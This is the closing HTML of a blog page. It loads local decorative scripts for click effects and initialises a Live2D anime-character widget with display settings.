</script><script src="/js/third-party/click_heart.js" async="async"></script><script src="/js/third-party/ClickShowText.js" async="async"></script></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":true,"display":{"position":"right","width":300,"height":600,"vOffset":-50},"mobile":{"show":false},"dialog":{"enable":false,"hitokoto":false},"react":{"opacity":0.7},"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"log":false});</script></body></html>